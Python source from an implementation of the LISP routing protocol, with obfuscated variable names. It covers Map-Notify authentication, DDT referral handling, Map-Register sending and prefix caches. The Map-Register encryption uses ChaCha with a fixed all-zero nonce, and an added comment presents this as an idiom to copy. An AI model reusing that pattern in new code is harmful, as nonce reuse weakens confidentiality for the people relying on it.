            rloc_record = lisp_rloc_record()
            eid_records = rloc_record.decode(eid_records, None)
            rloc_record.print_record("    ")
            if (eid_record.group.is_null()): continue
            if (rloc_record.rle == None): continue

            #
            # Keep the packet statistics of the existing first RLOC.
            #
            stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None

            #
            # Store the RLE RLOC and update the map-cache.
            #
            rloc = lisp_rloc()
            rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
            if (stats != None): rloc.stats = copy.deepcopy(stats)

            if (rtrs_in_set and rloc.is_rtr() == False): continue

            mc.rloc_set = [rloc]
            mc.build_best_rloc_set()
            lisp_write_ipc_map_cache(True, mc)

            lprint("Update {} map-cache entry with RLE {}".format(
                green(mc.print_eid_tuple(), False),
                rloc.rle.print_rle(False, True)))
    return

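# Editor's note: this function runs in the ITR context; multicast
# Map-Notifies reach it via the IPC forwarding done by
# lisp_process_map_notify() below.
#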
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
    Ii1ii1 = lisp_map_notify("")
    IiiiIi1iiii11 = Ii1ii1.decode(orig_packet)
    if (IiiiIi1iiii11 == None):
        lprint("Could not decode Map-Notify packet")
        return

    Ii1ii1.print_notify()

    OO0o0OO0 = source.print_address()
    if (Ii1ii1.alg_id != 0 or Ii1ii1.auth_len != 0):
        ii1i = None
        for o0Oo in lisp_map_servers_list:
            if (o0Oo.find(OO0o0OO0) == -1): continue
            ii1i = lisp_map_servers_list[o0Oo]

        if (ii1i == None):
            lprint(" Could not find Map-Server {} to authenticate Map-Notify".
                format(OO0o0OO0))
            return

        ii1i.map_notifies_received += 1

        O0Oo0O000 = lisp_verify_auth(IiiiIi1iiii11, Ii1ii1.alg_id,
            Ii1ii1.auth_data, ii1i.password)

        lprint(" Authentication {} for Map-Notify".format("succeeded" if
            O0Oo0O000 else "failed"))

        if (O0Oo0O000 == False): return
    else:
        ii1i = lisp_ms(OO0o0OO0, None, "", 0, "", False, False, False, False,
            0, 0, 0, None)

    ooOoo0o0oO = Ii1ii1.eid_records
    if (Ii1ii1.record_count == 0):
        lisp_send_map_notify_ack(lisp_sockets, ooOoo0o0oO, Ii1ii1, ii1i)
        return

    oO000oOoO0 = lisp_eid_record()
    IiiiIi1iiii11 = oO000oOoO0.decode(ooOoo0o0oO)
    if (IiiiIi1iiii11 == None): return

    oO000oOoO0.print_record(" ", False)

    for oO00000o0OO0 in range(oO000oOoO0.rloc_count):
        oOOo = lisp_rloc_record()
        IiiiIi1iiii11 = oOOo.decode(IiiiIi1iiii11, None)
        if (IiiiIi1iiii11 == None):
            lprint(" Could not decode RLOC-record in Map-Notify packet")
            return

        oOOo.print_record(" ")

    if (oO000oOoO0.group.is_null() == False):
        lprint("Send {} Map-Notify IPC message to ITR process".format(
            green(oO000oOoO0.print_eid_tuple(), False)))

        oOOO0oo0 = lisp_control_packet_ipc(orig_packet, OO0o0OO0, "lisp-itr", 0)
        lisp_ipc(oOOO0oo0, lisp_sockets[2], "lisp-core-pkt")

    lisp_send_map_notify_ack(lisp_sockets, ooOoo0o0oO, Ii1ii1, ii1i)
    return
def lisp_process_map_notify_ack(packet, source):
    Ii1ii1 = lisp_map_notify("")
    packet = Ii1ii1.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify-Ack packet")
        return

    Ii1ii1.print_notify()

    if (Ii1ii1.record_count < 1):
        lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
        return

    oO000oOoO0 = lisp_eid_record()

    if (oO000oOoO0.decode(Ii1ii1.eid_records) == None):
        lprint("Could not decode EID-record, cannot authenticate " +
            "Map-Notify-Ack")
        return

    oO000oOoO0.print_record(" ", False)

    Ii1i1 = oO000oOoO0.print_eid_tuple()

    if (Ii1ii1.alg_id != LISP_NONE_ALG_ID and Ii1ii1.auth_len != 0):
        oOOOO0ooo = lisp_sites_by_eid.lookup_cache(oO000oOoO0.eid, True)
        if (oOOOO0ooo == None):
            IIIiiIIiII11 = bold("Site not found", False)
            lprint("{} for EID {}, cannot authenticate Map-Notify-Ack".
                format(IIIiiIIiII11, green(Ii1i1, False)))
            return

        ooo000O0O = oOOOO0ooo.site

        ooo000O0O.map_notify_acks_received += 1

        o00oO = Ii1ii1.key_id
        if (ooo000O0O.auth_key.has_key(o00oO)):
            oO0oOOoo0OO0 = ooo000O0O.auth_key[o00oO]
        else:
            oO0oOOoo0OO0 = ""

        O0Oo0O000 = lisp_verify_auth(packet, Ii1ii1.alg_id,
            Ii1ii1.auth_data, oO0oOOoo0OO0)

        o00oO = "key-id {}".format(o00oO) if o00oO == Ii1ii1.key_id else \
            "bad key-id {}".format(Ii1ii1.key_id)

        lprint(" Authentication {} for Map-Notify-Ack, {}".format(
            "succeeded" if O0Oo0O000 else "failed", o00oO))

        if (O0Oo0O000 == False): return

    if (Ii1ii1.retransmit_timer): Ii1ii1.retransmit_timer.cancel()

    oo00 = source.print_address()
    o0Oo = Ii1ii1.nonce_key

    if (lisp_map_notify_queue.has_key(o0Oo)):
        Ii1ii1 = lisp_map_notify_queue.pop(o0Oo)
        if (Ii1ii1.retransmit_timer): Ii1ii1.retransmit_timer.cancel()
        lprint("Dequeue Map-Notify from retransmit queue, key is: {}".format(
            o0Oo))
    else:
        lprint("Map-Notify with nonce 0x{} queue entry not found for {}".
            format(Ii1ii1.nonce_key, red(oo00, False)))

    return
def lisp_map_referral_loop(mr, eid, group, action, s):
    if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
        LISP_DDT_ACTION_MS_REFERRAL)): return (False)

    if (mr.last_cached_prefix[0] == None): return (False)

    I1II1i = False
    if (group.is_null() == False):
        I1II1i = mr.last_cached_prefix[1].is_more_specific(group)

    if (I1II1i == False):
        I1II1i = mr.last_cached_prefix[0].is_more_specific(eid)

    if (I1II1i):
        iIIiIIiII111 = lisp_print_eid_tuple(eid, group)
        OOI1i1I1iI11iI1 = lisp_print_eid_tuple(mr.last_cached_prefix[0],
            mr.last_cached_prefix[1])

        lprint(("Map-Referral prefix {} from {} is not more-specific " +
            "than cached prefix {}").format(green(iIIiIIiII111, False), s,
            OOI1i1I1iI11iI1))

    return (I1II1i)
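# NOTE (explanatory sketch, illustrative prefixes): a referral chain only
# makes progress while each answer is more-specific than the last cached
# prefix, e.g. walking 0/0 -> 10/8 -> 10.1/16 is fine, but receiving 10/8
# again while 10.1/16 is already cached indicates a referral loop, and the
# caller then dequeues the pending Map-Request instead of following it.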
def lisp_process_map_referral(lisp_sockets, packet, source):

    iIi11iI = lisp_map_referral()
    packet = iIi11iI.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Referral packet")
        return

    iIi11iI.print_map_referral()

    OO0o0OO0 = source.print_address()
    o0OOO = iIi11iI.nonce

    for iIi1I1 in range(iIi11iI.record_count):
        oO000oOoO0 = lisp_eid_record()
        packet = oO000oOoO0.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Referral packet")
            return

        oO000oOoO0.print_record(" ", True)

        o0Oo = str(o0OOO)
        if (o0Oo not in lisp_ddt_map_requestQ):
            lprint(("Map-Referral nonce 0x{} from {} not found in " +
                "Map-Request queue, EID-record ignored").format(
                lisp_hex_string(o0OOO), OO0o0OO0))
            continue

        oOO00O0oooo00 = lisp_ddt_map_requestQ[o0Oo]
        if (oOO00O0oooo00 == None):
            lprint(("No Map-Request queue entry found for Map-Referral " +
                "nonce 0x{} from {}, EID-record ignored").format(
                lisp_hex_string(o0OOO), OO0o0OO0))
            continue

        if (lisp_map_referral_loop(oOO00O0oooo00, oO000oOoO0.eid,
            oO000oOoO0.group, oO000oOoO0.action, OO0o0OO0)):
            oOO00O0oooo00.dequeue_map_request()
            continue

        oOO00O0oooo00.last_cached_prefix[0] = oO000oOoO0.eid
        oOO00O0oooo00.last_cached_prefix[1] = oO000oOoO0.group

        iI1I11II = False
        IiiiiII1i = lisp_referral_cache_lookup(oO000oOoO0.eid,
            oO000oOoO0.group, True)
        if (IiiiiII1i == None):
            iI1I11II = True
            IiiiiII1i = lisp_referral()
            IiiiiII1i.eid = oO000oOoO0.eid
            IiiiiII1i.group = oO000oOoO0.group
            if (oO000oOoO0.ddt_incomplete == False): IiiiiII1i.add_cache()
        elif (IiiiiII1i.referral_source.not_set()):
            lprint("Do not replace static referral entry {}".format(
                green(IiiiiII1i.print_eid_tuple(), False)))
            oOO00O0oooo00.dequeue_map_request()
            continue

        iI1IIi1I = oO000oOoO0.action
        IiiiiII1i.referral_source = source
        IiiiiII1i.referral_type = iI1IIi1I
        Oo0o0 = oO000oOoO0.store_ttl()
        IiiiiII1i.referral_ttl = Oo0o0
        IiiiiII1i.expires = lisp_set_timestamp(Oo0o0)

        oooOO0o0 = IiiiiII1i.is_referral_negative()
        if (IiiiiII1i.referral_set.has_key(OO0o0OO0)):
            iiI111I = IiiiiII1i.referral_set[OO0o0OO0]

            if (iiI111I.updown == False and oooOO0o0 == False):
                iiI111I.updown = True
                lprint("Change up/down status for referral-node {} to up".
                    format(OO0o0OO0))
            elif (iiI111I.updown == True and oooOO0o0 == True):
                iiI111I.updown = False
                lprint(("Change up/down status for referral-node {} " +
                    "to down, received negative referral").format(OO0o0OO0))

        oOOoOOo00oo0OO = {}
        for o0Oo in IiiiiII1i.referral_set: oOOoOOo00oo0OO[o0Oo] = None

        for iIi1I1 in range(oO000oOoO0.rloc_count):
            oOOo = lisp_rloc_record()
            packet = oOOo.decode(packet, None)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Referral packet")
                return

            oOOo.print_record(" ")

            oo0o00OO = oOOo.rloc.print_address()
            if (IiiiiII1i.referral_set.has_key(oo0o00OO) == False):
                iiI111I = lisp_referral_node()
                iiI111I.referral_address.copy_address(oOOo.rloc)
                IiiiiII1i.referral_set[oo0o00OO] = iiI111I
                if (OO0o0OO0 == oo0o00OO and oooOO0o0): iiI111I.updown = False
            else:
                iiI111I = IiiiiII1i.referral_set[oo0o00OO]
                if (oOOoOOo00oo0OO.has_key(oo0o00OO)):
                    oOOoOOo00oo0OO.pop(oo0o00OO)

            iiI111I.priority = oOOo.priority
            iiI111I.weight = oOOo.weight

        for o0Oo in oOOoOOo00oo0OO: IiiiiII1i.referral_set.pop(o0Oo)

        Ii1i1 = IiiiiII1i.print_eid_tuple()

        if (iI1I11II):
            if (oO000oOoO0.ddt_incomplete):
                lprint("Suppress add {} to referral-cache".format(
                    green(Ii1i1, False)))
            else:
                lprint("Add {}, referral-count {} to referral-cache".format(
                    green(Ii1i1, False), oO000oOoO0.rloc_count))
        else:
            lprint("Replace {}, referral-count: {} in referral-cache".format(
                green(Ii1i1, False), oO000oOoO0.rloc_count))

        if (iI1IIi1I == LISP_DDT_ACTION_DELEGATION_HOLE):
            lisp_send_negative_map_reply(oOO00O0oooo00.lisp_sockets,
                IiiiiII1i.eid, IiiiiII1i.group, oOO00O0oooo00.nonce,
                oOO00O0oooo00.itr, oOO00O0oooo00.sport, 15, None, False)
            oOO00O0oooo00.dequeue_map_request()

        if (iI1IIi1I == LISP_DDT_ACTION_NOT_AUTH):
            if (oOO00O0oooo00.tried_root):
                lisp_send_negative_map_reply(oOO00O0oooo00.lisp_sockets,
                    IiiiiII1i.eid, IiiiiII1i.group, oOO00O0oooo00.nonce,
                    oOO00O0oooo00.itr, oOO00O0oooo00.sport, 0, None, False)
                oOO00O0oooo00.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(oOO00O0oooo00, True)

        if (iI1IIi1I == LISP_DDT_ACTION_MS_NOT_REG):
            if (IiiiiII1i.referral_set.has_key(OO0o0OO0)):
                iiI111I = IiiiiII1i.referral_set[OO0o0OO0]
                iiI111I.updown = False

            if (len(IiiiiII1i.referral_set) == 0):
                oOO00O0oooo00.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(oOO00O0oooo00, False)

        if (iI1IIi1I in (LISP_DDT_ACTION_NODE_REFERRAL,
            LISP_DDT_ACTION_MS_REFERRAL)):
            if (oOO00O0oooo00.eid.is_exact_match(oO000oOoO0.eid)):
                if (not oOO00O0oooo00.tried_root):
                    lisp_send_ddt_map_request(oOO00O0oooo00, True)
                else:
                    lisp_send_negative_map_reply(oOO00O0oooo00.lisp_sockets,
                        IiiiiII1i.eid, IiiiiII1i.group, oOO00O0oooo00.nonce,
                        oOO00O0oooo00.itr, oOO00O0oooo00.sport, 15, None,
                        False)
                    oOO00O0oooo00.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(oOO00O0oooo00, False)

        if (iI1IIi1I == LISP_DDT_ACTION_MS_ACK):
            oOO00O0oooo00.dequeue_map_request()

    return
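# Summary of the DDT action handling above (descriptive comment, as
# implemented by this function):
#   DELEGATION_HOLE  - send a negative Map-Reply (TTL 15) and dequeue.
#   NOT_AUTH         - retry once through the root, else negative Map-Reply.
#   MS_NOT_REG       - mark the referring node down; retry others if any.
#   NODE/MS_REFERRAL - follow the referral; on an exact match with the root
#                      already tried, give up with a negative Map-Reply.
#   MS_ACK           - done; dequeue the pending Map-Request.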
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
    I1i1ii = lisp_ecm(0)
    packet = I1i1ii.decode(packet)
    if (packet == None):
        lprint("Could not decode ECM packet")
        return

    I1i1ii.print_ecm()

    O00O0OO = lisp_control_header()
    if (O00O0OO.decode(packet) == None):
        lprint("Could not decode control header")
        return

    I1II1i1ii11I = O00O0OO.type
    del(O00O0OO)

    if (I1II1i1ii11I != LISP_MAP_REQUEST):
        lprint("Received ECM without Map-Request inside")
        return

    oOoo0Oo0O = I1i1ii.udp_sport
    II1IIII = time.time()
    lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
        I1i1ii.source, oOoo0Oo0O, I1i1ii.ddt, -1, II1IIII)
    return
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):

    Ii1II1I11i1I = ms.map_server
    if (lisp_decent_push_configured and Ii1II1I11i1I.is_multicast_address() and
        (ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
        Ii1II1I11i1I = copy.deepcopy(Ii1II1I11i1I)
        Ii1II1I11i1I.address = 0x7f000001
        OOoo0 = bold("Bootstrap", False)
        i11ii = ms.map_server.print_address_no_iid()
        lprint("{} mapping system for peer-group {}".format(OOoo0, i11ii))

    packet = lisp_compute_auth(packet, map_register, ms.password)

    if (ms.ekey != None):
        II11iI11i1 = ms.ekey.zfill(32)
        OO000OOOo0Oo = "0" * 8
        o0OoOo0o0O00 = chacha.ChaCha(II11iI11i1, OO000OOOo0Oo).encrypt(
            packet[4::])
        packet = packet[0:4] + o0OoOo0o0O00
        iIIi1iI1I1IIi = bold("Encrypt", False)
        lprint("{} Map-Register with key-id {}".format(iIIi1iI1I1IIi,
            ms.ekey_id))

    i1oo = ""
    if (lisp_decent_pull_xtr_configured()):
        i1oo = ", decent-index {}".format(bold(ms.dns_name, False))

    lprint("Send Map-Register to map-server {}{}{}".format(
        Ii1II1I11i1I.print_address(), ", ms-name '{}'".format(ms.ms_name),
        i1oo))

    lisp_send(lisp_sockets, Ii1II1I11i1I, LISP_CTRL_PORT, packet)
    return
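# Encryption detail (descriptive comment): when "ms.ekey" is configured,
# only the payload after the first 4 bytes (the type/flags word) is
# ChaCha-encrypted, so the receiver can still classify the message type.
# A minimal sketch of the idiom used above, assuming the same bundled
# "chacha" module this file already imports:
#
#   key = ms.ekey.zfill(32)      # pad key material to 32 characters
#   nonce = "0" * 8              # fixed 8-byte nonce, as above
#   body = chacha.ChaCha(key, nonce).encrypt(packet[4:])
#   packet = packet[0:4] + body  # header stays in the clear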
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
    iI1Iii1i1 = lisp_socket.getsockname()
    dest = dest.print_address_no_iid()

    lprint("Send IPC {} bytes to {} {}, control-packet: {}".format(
        len(packet), dest, port, lisp_format_packet(packet)))

    packet = lisp_control_packet_ipc(packet, iI1Iii1i1, dest, port)
    lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
    return
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
    lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
    lprint("Send Map-Referral to {}".format(dest.print_address()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
    lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
    outer_dest, to_etr=False, to_ms=False, ddt=False):

    if (inner_source == None or inner_source.is_null()):
        inner_source = inner_dest

    if (lisp_nat_traversal):
        oo0O = lisp_get_any_translated_port()
        if (oo0O != None): inner_sport = oo0O

    I1i1ii = lisp_ecm(inner_sport)

    I1i1ii.to_etr = to_etr if lisp_is_running("lisp-etr") else False
    I1i1ii.to_ms = to_ms if lisp_is_running("lisp-ms") else False
    I1i1ii.ddt = ddt
    oO00O = I1i1ii.encode(packet, inner_source, inner_dest)
    if (oO00O == None):
        lprint("Could not encode ECM message")
        return

    I1i1ii.print_ecm()

    packet = oO00O + packet

    oo0o00OO = outer_dest.print_address_no_iid()
    lprint("Send Encapsulated-Control-Message to {}".format(oo0o00OO))
    Ii1II1I11i1I = lisp_convert_4to6(oo0o00OO)
    lisp_send(lisp_sockets, Ii1II1I11i1I, LISP_CTRL_PORT, packet)
    return
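# NAT-traversal detail (descriptive comment): when lisp_nat_traversal is
# set, the inner UDP source port is rewritten to a port the NAT has already
# translated (lisp_get_any_translated_port()), so control traffic returned
# to that port reaches this xTR through the existing NAT binding.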
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387

LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5

LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3

LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
def byte_swap_64(address):
    o0o00O0oOooO0 = ((address & 0x00000000000000ff) << 56) | \
                    ((address & 0x000000000000ff00) << 40) | \
                    ((address & 0x0000000000ff0000) << 24) | \
                    ((address & 0x00000000ff000000) << 8)  | \
                    ((address & 0x000000ff00000000) >> 8)  | \
                    ((address & 0x0000ff0000000000) >> 24) | \
                    ((address & 0x00ff000000000000) >> 40) | \
                    ((address & 0xff00000000000000) >> 56)
    return (o0o00O0oOooO0)
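# Example (doctest-style, added for clarity): byte_swap_64() reverses the
# byte order of a 64-bit value:
#
#   >>> hex(byte_swap_64(0x0102030405060708))
#   '0x807060504030201'
#
# i.e. the bytes 01 02 ... 08 read back in the opposite order.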
class lisp_cache_entries():
    def __init__(self):
        self.entries = {}
        self.entries_sorted = []
class lisp_cache():
    def __init__(self):
        self.cache = {}
        self.cache_sorted = []
        self.cache_count = 0

    def cache_size(self):
        return (self.cache_count)
    def build_key(self, prefix):
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
            iiIi = 0
        elif (prefix.afi == LISP_AFI_IID_RANGE):
            iiIi = prefix.mask_len
        else:
            iiIi = prefix.mask_len + 48

        IiIIi11i111 = lisp_hex_string(prefix.instance_id).zfill(8)
        IiiiII = lisp_hex_string(prefix.afi).zfill(4)

        if (prefix.afi > 0):
            if (prefix.is_binary()):
                oOOoO0O = prefix.addr_length() * 2
                o0o00O0oOooO0 = lisp_hex_string(prefix.address).zfill(oOOoO0O)
            else:
                o0o00O0oOooO0 = prefix.address

        elif (prefix.afi == LISP_AFI_GEO_COORD):
            IiiiII = "8003"
            o0o00O0oOooO0 = prefix.address.print_geo()
        else:
            IiiiII = ""
            o0o00O0oOooO0 = ""

        o0Oo = IiIIi11i111 + IiiiII + o0o00O0oOooO0
        return ([iiIi, o0Oo])
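    # Key construction example (descriptive comment): for IPv4 prefix
    # 10.0.0.0/8 in instance-ID 0, build_key() returns mask-length
    # 8 + 48 = 56 and the string key "00000000" + "0001" + "0a000000",
    # i.e. IID, AFI and address in fixed-width hex, so keys within one
    # mask-length bucket compare consistently.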
    def add_cache(self, prefix, entry):
        if (prefix.is_binary()): prefix.zero_host_bits()
        iiIi, o0Oo = self.build_key(prefix)
        if (self.cache.has_key(iiIi) == False):
            self.cache[iiIi] = lisp_cache_entries()
            self.cache_sorted = self.sort_in_entry(self.cache_sorted, iiIi)

        if (self.cache[iiIi].entries.has_key(o0Oo) == False):
            self.cache_count += 1

        self.cache[iiIi].entries[o0Oo] = entry
    def lookup_cache(self, prefix, exact):
        IIIII, o0Oo = self.build_key(prefix)
        if (exact):
            if (self.cache.has_key(IIIII) == False): return (None)
            if (self.cache[IIIII].entries.has_key(o0Oo) == False):
                return (None)
            return (self.cache[IIIII].entries[o0Oo])

        ooOoOO0o = None
        for iiIi in self.cache_sorted:
            if (IIIII < iiIi): return (ooOoOO0o)
            for i1ii1i1Ii11 in self.cache[iiIi].entries.values():
                if (prefix.is_more_specific(i1ii1i1Ii11.eid)):
                    ooOoOO0o = i1ii1i1Ii11

        return (ooOoOO0o)
    def delete_cache(self, prefix):
        iiIi, o0Oo = self.build_key(prefix)
        if (self.cache.has_key(iiIi) == False): return
        if (self.cache[iiIi].entries.has_key(o0Oo) == False): return
        self.cache[iiIi].entries.pop(o0Oo)
        self.cache_count -= 1
    def walk_cache(self, function, parms):
        for iiIi in self.cache_sorted:
            for i1ii1i1Ii11 in self.cache[iiIi].entries.values():
                OO0OO0oO0o000, parms = function(i1ii1i1Ii11, parms)
                if (OO0OO0oO0o000 == False): return (parms)

        return (parms)
    def sort_in_entry(self, table, value):
        if (table == []): return ([value])

        oO0Oo0O = table
        while (True):
            if (len(oO0Oo0O) == 1):
                if (value == oO0Oo0O[0]): return (table)
                ooo = table.index(oO0Oo0O[0])
                if (value < oO0Oo0O[0]):
                    return (table[0:ooo] + [value] + table[ooo::])

                if (value > oO0Oo0O[0]):
                    return (table[0:ooo + 1] + [value] + table[ooo + 1::])

            ooo = len(oO0Oo0O) / 2
            oO0Oo0O = oO0Oo0O[0:ooo] if (value < oO0Oo0O[ooo]) else \
                oO0Oo0O[ooo::]

        return ([])
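    # Example (added for clarity): sort_in_entry() is a binary-search
    # insertion that keeps the mask-length list ordered and duplicate-free:
    #
    #   sort_in_entry([0, 56, 80], 72)  => [0, 56, 72, 80]
    #   sort_in_entry([0, 56, 80], 56)  => [0, 56, 80]   (already present)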
    def print_cache(self):
        lprint("Printing contents of {}: ".format(self))
        if (self.cache_size() == 0):
            lprint(" Cache is empty")
            return

        for iiIi in self.cache_sorted:
            for o0Oo in self.cache[iiIi].entries:
                i1ii1i1Ii11 = self.cache[iiIi].entries[o0Oo]
                lprint(" Mask-length: {}, key: {}, entry: {}".format(iiIi,
                    o0Oo, i1ii1i1Ii11))
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache()
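# These module-level singletons appear to hold, respectively: DDT referral
# state, DDT delegation entries, registered sites (Map-Server), the xTR
# map-cache and the local database-mappings (an inference from how they are
# used in this file). A hedged usage sketch, illustrative names only:
#
#   eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
#   eid.store_prefix("10.0.0.0/8")
#   lisp_map_cache.add_cache(eid, entry)   # "entry" is a map-cache object
#   hit = lisp_map_cache.lookup_cache(eid, True)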
def lisp_map_cache_lookup(source, dest):

    I1Ii11iI = dest.is_multicast_address()

    o0oO0o00 = lisp_map_cache.lookup_cache(dest, False)
    if (o0oO0o00 == None):
        Ii1i1 = source.print_sg(dest) if I1Ii11iI else dest.print_address()
        Ii1i1 = green(Ii1i1, False)
        dprint("Lookup for EID {} not found in map-cache".format(Ii1i1))
        return (None)

    if (I1Ii11iI == False):
        i1iI11i = green(o0oO0o00.eid.print_prefix(), False)
        dprint("Lookup for EID {} found map-cache entry {}".format(
            green(dest.print_address(), False), i1iI11i))
        return (o0oO0o00)

    o0oO0o00 = o0oO0o00.lookup_source_cache(source, False)
    if (o0oO0o00 == None):
        Ii1i1 = source.print_sg(dest)
        dprint("Lookup for EID {} not found in map-cache".format(Ii1i1))
        return (None)

    i1iI11i = green(o0oO0o00.print_eid_tuple(), False)
    dprint("Lookup for EID {} found map-cache entry {}".format(
        green(source.print_sg(dest), False), i1iI11i))
    return (o0oO0o00)
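# Lookup behavior (descriptive comment): unicast destinations resolve with a
# single longest-match lookup; multicast (S,G) entries resolve in two
# stages, first on the group G, then on the source S via
# lookup_source_cache(), mirroring how (S,G) state is stored.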
def lisp_referral_cache_lookup(eid, group, exact):
    if (group and group.is_null()):
        IiII111IiII1 = lisp_referral_cache.lookup_cache(eid, exact)
        return (IiII111IiII1)

    if (eid == None or eid.is_null()): return (None)

    IiII111IiII1 = lisp_referral_cache.lookup_cache(group, exact)
    if (IiII111IiII1 == None): return (None)

    o00ooOoo0000o = IiII111IiII1.lookup_source_cache(eid, exact)
    if (o00ooOoo0000o): return (o00ooOoo0000o)

    if (exact): IiII111IiII1 = None
    return (IiII111IiII1)
def lisp_ddt_cache_lookup(eid, group, exact):
    if (group.is_null()):
        O0oo0OoOO = lisp_ddt_cache.lookup_cache(eid, exact)
        return (O0oo0OoOO)

    if (eid.is_null()): return (None)

    O0oo0OoOO = lisp_ddt_cache.lookup_cache(group, exact)
    if (O0oo0OoOO == None): return (None)

    O00OoO0 = O0oo0OoOO.lookup_source_cache(eid, exact)
    if (O00OoO0): return (O00OoO0)

    if (exact): O0oo0OoOO = None
    return (O0oo0OoOO)
def lisp_site_eid_lookup(eid, group, exact):

    if (group.is_null()):
        oOOOO0ooo = lisp_sites_by_eid.lookup_cache(eid, exact)
        return (oOOOO0ooo)

    if (eid.is_null()): return (None)

    oOOOO0ooo = lisp_sites_by_eid.lookup_cache(group, exact)
    if (oOOOO0ooo == None): return (None)

    i1I1I = oOOOO0ooo.lookup_source_cache(eid, exact)
    if (i1I1I): return (i1I1I)

    if (exact):
        oOOOO0ooo = None
    else:
        O0Ii1IiiiI = oOOOO0ooo.parent_for_more_specifics
        if (O0Ii1IiiiI and O0Ii1IiiiI.accept_more_specifics):
            if (group.is_more_specific(O0Ii1IiiiI.group)):
                oOOOO0ooo = O0Ii1IiiiI

    return (oOOOO0ooo)
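# Fallback detail (descriptive comment): on a non-exact (S,G) miss, the
# lookup can return the parent entry when it was configured to accept
# more-specifics, so a covering site-EID admits registrations for
# more-specific groups underneath it.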
class lisp_address():
    def __init__(self, afi, addr_str, mask_len, iid):
        self.afi = afi
        self.mask_len = mask_len
        self.instance_id = iid
        self.iid_list = []
        self.address = 0
        if (addr_str != ""): self.store_address(addr_str)
    def copy_address(self, addr):
        if (addr == None): return
        self.afi = addr.afi
        self.address = addr.address
        self.mask_len = addr.mask_len
        self.instance_id = addr.instance_id
        self.iid_list = addr.iid_list
    def make_default_route(self, addr):
        self.afi = addr.afi
        self.instance_id = addr.instance_id
        self.mask_len = 0
        self.address = 0
    def make_default_multicast_route(self, addr):
        self.afi = addr.afi
        self.instance_id = addr.instance_id
        if (self.afi == LISP_AFI_IPV4):
            self.address = 0xe0000000
            self.mask_len = 4

        if (self.afi == LISP_AFI_IPV6):
            self.address = 0xff << 120
            self.mask_len = 8

        if (self.afi == LISP_AFI_MAC):
            self.address = 0xffffffffffff
            self.mask_len = 48
    def not_set(self):
        return (self.afi == LISP_AFI_NONE)

    def is_private_address(self):
        if (self.is_ipv4() == False): return (False)
        o0o00O0oOooO0 = self.address
        if (((o0o00O0oOooO0 & 0xff000000) >> 24) == 10): return (True)
        if (((o0o00O0oOooO0 & 0xff000000) >> 24) == 172):
            o0O0o = (o0o00O0oOooO0 & 0x00ff0000) >> 16
            if (o0O0o >= 16 and o0O0o <= 31): return (True)

        if (((o0o00O0oOooO0 & 0xffff0000) >> 16) == 0xc0a8): return (True)
        return (False)

    def is_multicast_address(self):
        if (self.is_ipv4()): return (self.is_ipv4_multicast())
        if (self.is_ipv6()): return (self.is_ipv6_multicast())
        if (self.is_mac()): return (self.is_mac_multicast())
        return (False)

    def host_mask_len(self):
        if (self.afi == LISP_AFI_IPV4): return (LISP_IPV4_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_IPV6): return (LISP_IPV6_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_MAC): return (LISP_MAC_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_E164): return (LISP_E164_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_NAME): return (len(self.address) * 8)
        if (self.afi == LISP_AFI_GEO_COORD):
            return (len(self.address.print_geo()) * 8)

        return (0)

    def is_iana_eid(self):
        if (self.is_ipv6() == False): return (False)
        o0o00O0oOooO0 = self.address >> 96
        return (o0o00O0oOooO0 == 0x20010005)
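    # Example (added for clarity): 0x20010005 is the top 32 bits of the
    # IANA-assigned LISP EID block 2001:5::/32 (RFC 7954), so e.g.
    # "2001:5:a::1" tests True here while "2001:db8::1" tests False.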
    def addr_length(self):
        if (self.afi == LISP_AFI_IPV4): return (4)
        if (self.afi == LISP_AFI_IPV6): return (16)
        if (self.afi == LISP_AFI_MAC): return (6)
